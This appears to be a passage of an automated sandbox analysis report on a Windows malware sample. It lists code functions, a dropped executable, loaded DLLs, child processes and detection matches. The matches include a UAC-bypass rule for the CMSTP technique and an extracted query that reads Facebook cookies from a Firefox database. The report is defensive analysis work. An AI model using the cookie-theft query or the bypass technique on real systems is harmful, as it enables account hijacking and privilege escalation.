                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B542104_2_00B54210
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BC63204_2_00BC6320
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B4E3404_2_00B4E340
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B2A4A04_2_00B2A4A0
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B224804_2_00B22480
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B124104_2_00B12410
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B1A5404_2_00B1A540
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B266A04_2_00B266A0
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BAC6904_2_00BAC690
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00C046504_2_00C04650
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B327B04_2_00B327B0
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B548204_2_00B54820
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00C009DE4_2_00C009DE
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BC29D04_2_00BC29D0
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00C029404_2_00C02940
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B2CAD04_2_00B2CAD0
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B58AC04_2_00B58AC0
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B28B804_2_00B28B80
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B4AB804_2_00B4AB80
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BCCBD04_2_00BCCBD0
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BACB604_2_00BACB60
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BAEC604_2_00BAEC60
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B1CC404_2_00B1CC40
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B70C404_2_00B70C40
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B32FF04_2_00B32FF0
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B18F404_2_00B18F40
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B2F0304_2_00B2F030
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BAF0104_2_00BAF010
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B910004_2_00B91000
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B970504_2_00B97050
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BC50404_2_00BC5040
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B251904_2_00B25190
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B811804_2_00B81180
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B4B1C04_2_00B4B1C0
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B311504_2_00B31150
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00C1B21C4_2_00C1B21C
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B712504_2_00B71250
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B973004_2_00B97300
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00C1B33C4_2_00C1B33C
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B454804_2_00B45480
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BAD4804_2_00BAD480
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B1B4D04_2_00B1B4D0
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00C095C14_2_00C095C1
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BC56C04_2_00BC56C0
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B5F6504_2_00B5F650
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00C197C14_2_00C197C1
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B637104_2_00B63710
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BFD74B4_2_00BFD74B
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BF98004_2_00BF9800
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B498704_2_00B49870
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BFD97D4_2_00BFD97D
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BAF9604_2_00BAF960
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B6FAA04_2_00B6FAA0
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B35AE04_2_00B35AE0
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BCBBB04_2_00BCBBB0
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B53BD04_2_00B53BD0
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00BA1BD04_2_00BA1BD0
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B17B104_2_00B17B10
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B31B704_2_00B31B70
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B33CD04_2_00B33CD0
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B21C204_2_00B21C20
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B91C604_2_00B91C60
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B4FC404_2_00B4FC40
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B39D904_2_00B39D90
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B6DD704_2_00B6DD70
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B3DE104_2_00B3DE10
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: 4_2_00B37F304_2_00B37F30
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeCode function: 6_2_00AD60766_2_00AD6076
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeCode function: 6_2_00AD6D006_2_00AD6D00
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\MDSxhU.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeProcess token adjusted: Load DriverJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeProcess token adjusted: SecurityJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: String function: 00BA5770 appears 31 times
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: String function: 00B32310 appears 34 times
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: String function: 00BF5F80 appears 31 times
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: String function: 00B17550 appears 48 times
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: String function: 00B17800 appears 134 times
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeCode function: String function: 00B182C0 appears 142 times
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 2052
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: Resource name: ZIP type: Zip archive data, at least v1.0 to extract, compression method=store
                        Source: MyProg.exe.6.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 4.0.65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe.b10000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 4.2.65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe.b10000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: MDSxhU.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: MDSxhU.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: MDSxhU.exe.4.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                        Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@10/23@6/5
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeCode function: 6_2_00AD119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,6_2_00AD119F
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k1[1].rarJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2876
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3212
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeMutant created: \Sessions\1\BaseNamedObjects\patatoes
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeFile created: C:\Users\user~1\AppData\Local\Temp\MDSxhU.exeJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000000.1333716533.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000000.1333716533.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: SELECT host,name,value,expiry FROM moz_cookies where host='.facebook.com';
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000000.1333716533.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000000.1333716533.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000000.1333716533.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeReversingLabs: Detection: 97%
                        Source: unknownProcess created: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe "C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe"
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeProcess created: C:\Users\user\AppData\Local\Temp\MDSxhU.exe C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 2052
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 1524
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeProcess created: C:\Users\user\AppData\Local\Temp\MDSxhU.exe C:\Users\user~1\AppData\Local\Temp\MDSxhU.exeJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeSection loaded: netbios.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exeSection loaded: winnsi.dllJump to behavior
